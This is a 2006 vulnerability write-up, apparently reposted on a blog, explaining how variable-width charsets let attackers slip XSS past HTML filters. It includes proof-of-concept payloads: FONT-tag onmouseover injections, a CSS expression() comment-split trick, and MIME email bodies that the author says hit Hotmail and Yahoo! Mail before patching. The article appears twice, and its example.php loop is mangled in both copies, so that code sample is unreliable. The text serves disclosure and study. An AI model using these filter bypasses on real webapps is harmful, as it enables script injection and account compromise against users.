Bypassing script filters with variable-width encodings
Author: Cheng Peng Su (applesoup_at_gmail.com)
Date: August 7, 2006
We've all known that the main problem of constructing XSS attacks is
how to obfuscate malicious code. In the following paragraphs I will
attempt to explain the concept of bypassing script filters with
variable-width encodings, and disclose the applications of this
concept to
Hotmail and Yahoo! Mail web-based mail services.
Variable-width encoding Introduction
====================================
A variable-width encoding(a.k.a variable-length encoding) is a type of
character encoding scheme in which codes of differing lengths are
used to encode a character set. Most common variable-width encodings
are multibyte encodings, which use varying numbers of bytes to encode
different characters. The first use of multibyte encodings was for the
encoding of Chinese, Japanese and Korean, which have large character
sets well in excess of 256 characters. The Unicode standard has two
variable-width encodings: UTF-8 and UTF-16. The most commonly-used
codes are two-byte codes. The EUC-CN form of GB2312, plus EUC-JP and
EUC-KR, are examples of such two-byte EUC codes. And there are also
some three-byte and four-byte codes.
Example and Discussion
======================
The following is a php file from which I will start to introduce my idea.
------------------------------example.php--------------------------------
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body>
<?
for( i<256; i, Internet Explorer 6.0(SP2) will display "Char
XXX is not available". When i=0xC0 for example,
consider the following code:
Char 192 is <font face="xyz[0xC0]">not </font><font face="
onmouseover=alert(192) s=[0xC0]" >available</font>
0xC0 is one of the 32 first bytes of 2-byte sequences (0xC0-0xDF) in
UTF-8. So when IE parses the above code, it will consider 0xC0 and the
following quote as a sequence, and therefore these two pairs of FONT
elements will become one with "xyz[0xC0]">not </font><font face=" as
the value of FACE parameter. The second 0xC0 will start another 2-byte
sequence as a value of NOTEXIST parameter which is not quoted. Due
to a space character following by the quote, 0xE0-0xEF which are first
bytes of 3-byte sequences, together with the following quote and one
space character will be considered as the value of NOTEXIST parameter.
And each of the first bytes of 4-byte sequences(0xF0-0xF7), 5-byte
sequences(0xF8-0xFB), 6-byte sequences(0xFC-0xFD), together with the
following quote and space characters will be considered as one
sequence.
Here are the results of the above code parsed by Internet Explorer
6.0(SP2), Firefox 1.5.0.6 and Opera 9.0.1 in different variable-width
encodings respectively. Note that the numbers in the table are the
ranges of "available" characters.
+-----------+-----------+-----------+-----------+
| | IE | FF | OP |
+-----------+-----------+-----------+-----------+
| UTF-8 | 0xC0-0xFF | none | none |
+-----------+-----------+-----------+-----------+
| GB2312 | 0x81-0xFE | none | 0x81-0xFE |
+-----------+-----------+-----------+-----------+
| GB18030 | none | none | 0x81-0xFE |
+-----------+-----------+-----------+-----------+
| BIG5 | 0x81-0xFE | none | 0x81-0xFE |
+-----------+-----------+-----------+-----------+
| EUC-KR | 0x81-0xFE | none | 0x81-0xFE |
+-----------+-----------+-----------+-----------+
| EUC-JP | 0x81-0x8D | 0x8F | 0x8E |
| | 0x8F-0x9F | | 0x8F |
| | 0xA1-0xFE | | 0xA1-0xFE |
+-----------+-----------+-----------+-----------+
| SHIFT_JIS | 0x81-0x9F | 0x81-0x9F | 0x81-0x9F |
| | 0xE0-0xFC | 0xE0-0xFC | 0xE0-0xFC |
+-----------+-----------+-----------+-----------+
Application
===========
I don't think there is a typical exploitation of bypassing script
filters with variable-width encodings, because the exploitation is
very
flexible. But you just need to remember that if the webapp use
variable-width encodings, you can bury some characters following by
your
entry, and the buried characters might be very crucial.
The above code might be exploited in general webapps which allow you
to add formatting to your entry in the same way as HTML does. For
example, in some forums, [font=Courier New]message[/font] in your
message will be transformed into <font face="Courier
New">message</font>.
Supposing it use UTF-8, we can attack by sending
[font=xyz[0xC0]]buried[/font][font=abc onmouseover=alert()
s=[0xC0]]exploited[/font]
And it will be tranformed into
<font face="xyz[0xC0]">buried</font><font face="abc
onmouseover=alert() s=[0xC0]">exploited</font>
Again, the exploitation is very flexible, this FONT-FONT example is
just an enlightening one. The following exploitaion to Yahoo! Mail is
quite different from this one.
Disclosure
==========
Using this method, I have found two XSS vulnerabilities in Hotmail and
Yahoo! Mail web-based mail services. I informed Yahoo and Microsoft
on April 30 and May 12 respectively. And they have patched the vulnerabilities.
Yahoo! Mail XSS
---------------
Before I discovered this vulnerability, Yahoo! Mail filtering engine
could block "expression()" syntax in a CSS attribute using a comment
to break up expression( expr/* */ession() ). I used [0x81] with the
following asterisk to make a sequence, so that the second */ would
close the comment. But the filtering engine considered the first two
comment symbol as a pair.
--------------------------------------------------------------------
MIME-Version: 1.0
From: user<user@site.com>
Content-Type: text/html; charset=GB2312
Subject: example
<span style='width:expr/*[0x81]*/*/ession(alert())'>exploited</span>
.
--------------------------------------------------------------------
Hotmail XSS
-----------
This exploitation is almost the same as the example.php.
--------------------------------------------------------------------
MIME-Version: 1.0
From: user<user@site.com>
Content-Type: text/html; charset=SHIFT_JIS
Subject: example
<font face="[0x81]"></font><font face=" onmouseover=alert()
s=[0x81]">exploited</font>
.
--------------------------------------------------------------------
Reference
=========
Wikipedia:Variable-width
encoding(http://en.wikipedia.org/wiki/Variable-width_encoding)
RFC 3629, the UTF-8 standard(http://tools.ietf.org/html/rfc3629)
RSnake:XSS Cheat Sheet(http://ha.ckers.org/xss.html)
( Original text: http://applesoup.googlepages.com/bypass_filter.txt )
Date: August 7, 2006
We've all known that the main problem of constructing XSS attacks is
how to obfuscate malicious code. In the following paragraphs I will
attempt to explain the concept of bypassing script filters with
variable-width encodings, and disclose the applications of this
concept to
Hotmail and Yahoo! Mail web-based mail services.
Variable-width encoding Introduction
====================================
A variable-width encoding(a.k.a variable-length encoding) is a type of
character encoding scheme in which codes of differing lengths are
used to encode a character set. Most common variable-width encodings
are multibyte encodings, which use varying numbers of bytes to encode
different characters. The first use of multibyte encodings was for the
encoding of Chinese, Japanese and Korean, which have large character
sets well in excess of 256 characters. The Unicode standard has two
variable-width encodings: UTF-8 and UTF-16. The most commonly-used
codes are two-byte codes. The EUC-CN form of GB2312, plus EUC-JP and
EUC-KR, are examples of such two-byte EUC codes. And there are also
some three-byte and four-byte codes.
Example and Discussion
======================
The following is a php file from which I will start to introduce my idea.
------------------------------example.php--------------------------------
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body>
<?
for(
XXX is not available". When
consider the following code:
Char 192 is <font face="xyz[0xC0]">not </font><font face="
onmouseover=alert(192) s=[0xC0]" >available</font>
0xC0 is one of the 32 first bytes of 2-byte sequences (0xC0-0xDF) in
UTF-8. So when IE parses the above code, it will consider 0xC0 and the
following quote as a sequence, and therefore these two pairs of FONT
elements will become one with "xyz[0xC0]">not </font><font face=" as
the value of FACE parameter. The second 0xC0 will start another 2-byte
sequence as a value of NOTEXIST parameter which is not quoted. Due
to a space character following by the quote, 0xE0-0xEF which are first
bytes of 3-byte sequences, together with the following quote and one
space character will be considered as the value of NOTEXIST parameter.
And each of the first bytes of 4-byte sequences(0xF0-0xF7), 5-byte
sequences(0xF8-0xFB), 6-byte sequences(0xFC-0xFD), together with the
following quote and space characters will be considered as one
sequence.
Here are the results of the above code parsed by Internet Explorer
6.0(SP2), Firefox 1.5.0.6 and Opera 9.0.1 in different variable-width
encodings respectively. Note that the numbers in the table are the
ranges of "available" characters.
+-----------+-----------+-----------+-----------+
| | IE | FF | OP |
+-----------+-----------+-----------+-----------+
| UTF-8 | 0xC0-0xFF | none | none |
+-----------+-----------+-----------+-----------+
| GB2312 | 0x81-0xFE | none | 0x81-0xFE |
+-----------+-----------+-----------+-----------+
| GB18030 | none | none | 0x81-0xFE |
+-----------+-----------+-----------+-----------+
| BIG5 | 0x81-0xFE | none | 0x81-0xFE |
+-----------+-----------+-----------+-----------+
| EUC-KR | 0x81-0xFE | none | 0x81-0xFE |
+-----------+-----------+-----------+-----------+
| EUC-JP | 0x81-0x8D | 0x8F | 0x8E |
| | 0x8F-0x9F | | 0x8F |
| | 0xA1-0xFE | | 0xA1-0xFE |
+-----------+-----------+-----------+-----------+
| SHIFT_JIS | 0x81-0x9F | 0x81-0x9F | 0x81-0x9F |
| | 0xE0-0xFC | 0xE0-0xFC | 0xE0-0xFC |
+-----------+-----------+-----------+-----------+
Application
===========
I don't think there is a typical exploitation of bypassing script
filters with variable-width encodings, because the exploitation is
very
flexible. But you just need to remember that if the webapp use
variable-width encodings, you can bury some characters following by
your
entry, and the buried characters might be very crucial.
The above code might be exploited in general webapps which allow you
to add formatting to your entry in the same way as HTML does. For
example, in some forums, [font=Courier New]message[/font] in your
message will be transformed into <font face="Courier
New">message</font>.
Supposing it use UTF-8, we can attack by sending
[font=xyz[0xC0]]buried[/font][font=abc onmouseover=alert()
s=[0xC0]]exploited[/font]
And it will be tranformed into
<font face="xyz[0xC0]">buried</font><font face="abc
onmouseover=alert() s=[0xC0]">exploited</font>
Again, the exploitation is very flexible, this FONT-FONT example is
just an enlightening one. The following exploitaion to Yahoo! Mail is
quite different from this one.
Disclosure
==========
Using this method, I have found two XSS vulnerabilities in Hotmail and
Yahoo! Mail web-based mail services. I informed Yahoo and Microsoft
on April 30 and May 12 respectively. And they have patched the vulnerabilities.
Yahoo! Mail XSS
---------------
Before I discovered this vulnerability, Yahoo! Mail filtering engine
could block "expression()" syntax in a CSS attribute using a comment
to break up expression( expr/* */ession() ). I used [0x81] with the
following asterisk to make a sequence, so that the second */ would
close the comment. But the filtering engine considered the first two
comment symbol as a pair.
--------------------------------------------------------------------
MIME-Version: 1.0
From: user<user@site.com>
Content-Type: text/html; charset=GB2312
Subject: example
<span style='width:expr/*[0x81]*/*/ession(alert())'>exploited</span>
.
--------------------------------------------------------------------
Hotmail XSS
-----------
This exploitation is almost the same as the example.php.
--------------------------------------------------------------------
MIME-Version: 1.0
From: user<user@site.com>
Content-Type: text/html; charset=SHIFT_JIS
Subject: example
<font face="[0x81]"></font><font face=" onmouseover=alert()
s=[0x81]">exploited</font>
.
--------------------------------------------------------------------
Reference
=========
Wikipedia:Variable-width
encoding(http://en.wikipedia.org/wiki/Variable-width_encoding)
RFC 3629, the UTF-8 standard(http://tools.ietf.org/html/rfc3629)
RSnake:XSS Cheat Sheet(http://ha.ckers.org/xss.html)
( Original text: http://applesoup.googlepages.com/bypass_filter.txt )
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· .NET 9 new features-C#13新的锁类型和语义
· Linux系统下SQL Server数据库镜像配置全流程详解
· 现代计算机视觉入门之:什么是视频
· 你所不知道的 C/C++ 宏知识
· 聊一聊 操作系统蓝屏 c0000102 的故障分析
· 不到万不得已,千万不要去外包
· C# WebAPI 插件热插拔(持续更新中)
· .NET 9 new features-C#13新的锁类型和语义
· 会议真的有必要吗?我们产品开发9年了,但从来没开过会
· 《SpringBoot》EasyExcel实现百万数据的导入导出